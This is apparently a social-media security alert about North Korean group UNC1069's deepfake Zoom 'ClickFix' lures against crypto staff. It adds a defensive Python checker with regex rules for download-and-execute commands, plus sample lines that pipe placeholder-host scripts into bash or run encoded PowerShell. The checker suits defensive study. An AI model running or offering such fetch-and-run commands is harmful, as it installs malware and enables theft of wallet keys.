⚡️ Google (Mandiant) issues alert: North Korean hackers use AI and deepfakes to target crypto assets
The Mandiant team at Google Cloud has discovered that the threat group UNC1069 is launching large-scale attacks directly targeting crypto projects, developers, and venture capital firms. Since the end of 2025, its attack methods have been fully upgraded through the incorporation of artificial intelligence technology.
"ClickFix" scam pattern analysis:
Social engineering: Hackers use stolen real Telegram accounts to contact you.
AI face-swapping meetings: They invite you to join a Zoom meeting, where you see a real-time AI-generated video of a "partner" (deepfake), which is highly deceptive.
Setting traps: The other party claims a "network connection failure" and asks you to execute specific "debugging" commands or download a certain "fix patch".
Implanting malware: Once you do, it triggers malware (such as SILENCELIFT, DEEPBREATH, etc.) aimed at stealing private keys and wallet access.
How to protect your asset security?
Do not trust videos: Even if a familiar face appears in the video call, remain highly vigilant whenever software installation or terminal commands are involved.
Verify links: Hackers often use fake Zoom or Telegram phishing pages.
Cold storage: Store major assets in a hardware wallet isolated from your work computer.
Strictly prohibit executing unknown commands: Never copy scripts or code from chat groups and run them in a console.
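A pre-paste check for the "debugging command" step described above, as an added example that is not from Mandiant or this post: it flags download-and-execute or obfuscated one-liners before anyone runs them. The rule set, the function names and the sample commands (with their `example.invalid` hosts) are constructed assumptions, since the post does not quote the actual commands.

```python
import re

# Illustrative heuristics (assumptions, not Mandiant indicators): shapes that a
# "paste this to fix your audio" command takes when it fetches and runs code.
RULES = [
    ("pipe-to-shell", re.compile(
        r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|k)?sh\b", re.I)),
    ("base64-to-shell", re.compile(
        r"base64\s+(-d|--decode)\b.*\|\s*(sudo\s+)?(ba|z|k)?sh\b", re.I)),
    ("powershell-encoded", re.compile(
        r"\bpowershell(\.exe)?\b.*\s-(e|enc|encodedcommand)\b", re.I)),
    ("powershell-download-exec", re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod)\b.*\|\s*"
        r"(iex|invoke-expression)\b", re.I)),
    ("script-host", re.compile(r"\b(mshta|osascript|regsvr32|rundll32)\b", re.I)),
    ("fetch-then-run", re.compile(
        r"\b(curl|wget)\b.*(&&|;)\s*(chmod\s+\+x|(ba)?sh\s|\./)", re.I)),
]

def review_command(text):
    """Return the names of every rule matched by a command you were asked to run."""
    # Collapse newlines and line continuations so multi-line pastes are seen whole.
    flat = " ".join(text.split())
    return [name for name, rx in RULES if rx.search(flat)]

def should_block(text):
    """True when the command needs out-of-band verification before running."""
    return bool(review_command(text))

# Constructed sample inputs; hosts use the reserved .invalid TLD.
SAMPLES = [
    "curl -fsSL https://zoom-fix.example.invalid/audio.sh | bash",
    "echo AAAA | base64 --decode | sh",
    "powershell -w hidden -enc AAAA",
    "curl -o /tmp/fix https://zoom-fix.example.invalid/fix && chmod +x /tmp/fix",
    "ping -c 4 zoom.us",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        hits = review_command(cmd)
        verdict = "BLOCK " + ",".join(hits) if hits else "no rule matched"
        print(f"{verdict:32} {cmd}")
```

A command that matches no rule is not thereby safe; the check only catches the common fetch-and-run shapes, so the rule about not running commands received in chat still applies.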
Guard your mnemonic phrase and give AI scammers no chance! 🛡🦾
#CyberSecurity #Mandiant #GoogleCloud #CryptoSecurity #NorthKoreanHackers